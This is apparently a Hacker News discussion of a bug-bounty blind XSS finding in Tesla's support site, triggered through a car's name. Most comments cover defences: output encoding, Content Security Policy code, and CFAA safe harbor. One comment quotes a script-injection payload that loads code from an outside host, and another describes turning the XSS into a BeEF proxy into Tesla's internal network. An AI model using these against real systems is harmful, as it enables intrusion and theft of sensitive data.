I believe the sensor in F1 is actually measuring the ride height of the vehicle.


In some jurisdictions the law says that the car speedometer must show a higher speed than the true one (as long as tyres aren't above the correct pressure), so that the driver can "trust" the speedometer to spare them a speeding ticket. On my car 140 km/h on the speedometer corresponds to 128-130 km/h on the GPS.


They probably use GPS? If not, then just get bigger tires.


They would have to verify beforehand how accurate the speedometer is.


A car's self reported speed is not accurate enough - for example if you slip on gravel or ice, the reported speed would momentarily be higher.


Or if you are braking it will be lower.


I can imagine the support call:

> Did you really name your Tesla "><script src=//zlz.xss.ht></script>?

> Oh, yes, little Bobby ScriptSrc, we call him.


I mentioned this to my coworkers who brought up something I hadn't thought of - would this be illegal in the USA via something such as CFAA? https://en.wikipedia.org/wiki/Computer_Fraud_and_Abuse_Act He technically accessed Tesla's dashboard without authorization, for example.


(Obligatory: I am not a lawyer)

This is what the "safe harbor" that the author was referring to is supposed to cover.

> Tesla considers that a pre-approved, good-faith security researcher who complies with this policy to access a computer on a research-registered vehicle has not accessed a computer without authorization or exceeded authorized access under the Computer Fraud and Abuse Act ("CFAA"). [1]

*.teslamotors.com, which is where the blind XSS payload fired, is in scope and therefore the safe harbor covers that asset too. For more on bug bounty safe harbors, I would highly recommend taking a look at Amit Elazari's work at https://amitelazari.com/%23legalbugbounty-hof and https://github.com/edoverflow/legal-bug-bounty.

[1]: https://bugcrowd.com/tesla


Tesla authorizes certain activities through their Bug Bounty program: https://bugcrowd.com/tesla

This is the first clause in the "in scope" section, so it is not unauthorized.

It would be bad if he used this to just wander around in their website, though. Nobody's contested whether this is worth a $10,000 payout yet, but this seems a decent place to point out that using https://beefproject.com, you can use that XSS vulnerability as a reverse proxy back into Tesla's network, and browse through the support site authenticated as the user currently accessing the XSS payload. This isn't just an XSS, it was an authentication bypass that a real attacker could have leveraged into access to that internal web site full of sensitive info in just a few minutes.


Storing auth tokens in localStorage rather than httpOnly cookies is a problematic trend because of vulnerabilities like this. If you can exfiltrate an auth token, you get long-lived access to the system.


That's impressive: a support process that is responsive, fair, and doesn't mess about. Companies around the world could learn something from this. They probably won't, but they certainly all could.


Tangentially, how long did it take to get the windshield fixed? I've heard horror stories about their service.


I've yet to fix it because the crack isn't too bad yet. Their windshield replacement is done through retailers who meet their standards, not Tesla directly, so I assume it won't be too bad as all they have to do is ship the windscreen.


What would the fix for this be? Enabling CORS only for `https://garage.vn.teslamotors.com`?


CORS won't do it, because it protects the response target, not the response source.

CSP would do the trick, though.

The other fix is properly escaping things before sticking them in your markup.


> The other fix is properly escaping things before sticking them in your markup.

Or simply not displaying user data using a markup language with built-in remote code execution.


Well, yes, there are various levels of "thinking outside the box" here that could be applied.


In addition to properly escaping inputs, Content Security Policy Headers to restrict the hosts that the browser executes JavaScript from (e.g., script-src). https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Co...
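A sketch of what such a policy header might look like (the allowlist here is hypothetical; a real one would name the specific hosts Tesla serves scripts from):

```javascript
// Build a restrictive Content-Security-Policy: scripts may only load from
// the page's own origin plus an optional allowlist, so an injected
// <script src=//attacker.example></script> tag is refused by the browser.
function cspHeader(extraScriptHosts = []) {
  const scriptSrc = ["'self'", ...extraScriptHosts].join(' ');
  return `default-src 'self'; script-src ${scriptSrc}; object-src 'none'`;
}

console.log(cspHeader());
// default-src 'self'; script-src 'self'; object-src 'none'

// Applied per-response, e.g.:
//   res.setHeader('Content-Security-Policy', cspHeader());
```

Note this is defence in depth, not a substitute for output encoding - inline-script injection still needs to be blocked too (the default policy above disallows inline scripts unless 'unsafe-inline' is added).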


Sanitization of the text input (e.g. < becomes &lt;, > becomes &gt;, etc). This is automatic/implicit in a lot of modern web frameworks (since text and HTML are distinct types and output to a page is treated differently, with text sanitization being implied unless you opt out).

You shouldn't ever be running untrusted JavaScript. Content Security Policy and similar are just extra layers of protection if you mess up.
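A minimal sketch of that kind of encoding (real frameworks do this for you by default; don't hand-roll it in production):

```javascript
// Replace the five characters that can change HTML structure with
// entities, so untrusted text renders as inert content.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// The payload from the article becomes harmless text:
console.log(escapeHtml('"><script src=//zlz.xss.ht></script>'));
// &quot;&gt;&lt;script src=//zlz.xss.ht&gt;&lt;/script&gt;
```

Note this only covers HTML text and double-quoted attribute contexts; other contexts (URLs, inline JS, CSS) need their own encoders.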


Not the input, the output. There are some good comments on this thread about the distinction.

Case in point: the owner altered the vehicle's name using the vehicle's own UI (which is probably not browser based). That input gets stored in the database. Then another system, web-based, wants to display it. If you don't encode the output, you'll be exposed.

Never trust that the input is properly encoded. HTML encode it before display, always.


This pedantism only makes sense if you stop reading five words in, ignore the rest of that same sentence, and ignore the context.

I'm not going to address it because it wasn't made in good faith and adds no value to the actual (rather than imagined) discussion.


> pedantism

Sorry, I can't help myself: pedantry


That would be a good first step, but more importantly making sure any content is rendered in a safe way. In this instance safe means making sure HTML entities are properly encoded and escaped.


There is no reason why an internal interface needs to be in a browser, or a browser with access to the internet.


There's no reason why it shouldn't be either.

The page being discussed is accessed by Tesla garages all over the country (and potentially internationally); creating a web app on an intranet site makes a lot of sense (for a single point of update, a single point of support, and the ability to run across diverse user devices). Particularly as the raw data always needs to come from Tesla's HQ either way.

As to if the same garage machine should also have access to the internet, I cannot speak to that, it depends what else it is being used for (e.g. showing customers Tesla's public facing website for example, accessing third party vendor's inventory systems, research, etc).

No platform is immune from insecure usage. Not desktop software. Not terminal emulators. Not even mobile apps. That's particularly true when the context you're stealing information from is the same as the context you're attempting to run evil code.


I’m saying a network namespace or equivalent should isolate the browser from being able to access external IPs or non-whitelisted IPs, if the browser can also access internal systems.

A separate browser instance should be used for accessing external links, preferably with JIT disabled, with a file system namespace or equivalent disabling access to much of the file system.

But okay, nothing is secure according to you.


Sanitize the output of the car name field so that any HTML tags are escaped.


That was an awesome summary and a good example of the value of bug bounty programs.


This is a great example of why it's terrible to have a car that can be remote controlled including the ability to push arbitrary updates. It should not be possible to use XSS to compromise a vehicle.


Following this logic, nothing should be remotely controlled because there might be security risks. Including OS updates to laptops.


Correct. No one should be able to push out arbitrary code without explicit user approval.


Users have a terrible habit of not running updates. Years of botnets suggest that automatic updates are probably the way to go.


In a perfect world, where all users are smart, sure.

But we're living in a world where there are still people running unpatched Windows XP boxes vulnerable to MS08-067.

If it weren't for Windows automatically installing updates, I imagine at least half of home users would still be vulnerable to Eternal Blue.


Sure, but your laptop isn't gonna drive you straight into a wall, is it?


XSS compromised a remote web app, not the vehicle. The vehicle hacked Tesla HQ, not vice versa


I share my birthday with a car. I'm unsure how to feel about this, probably better than sharing it with Rupert Murdoch, but worse than sharing it with Douglas Adams.


Nice to see Sam reached the front page of hacker news!



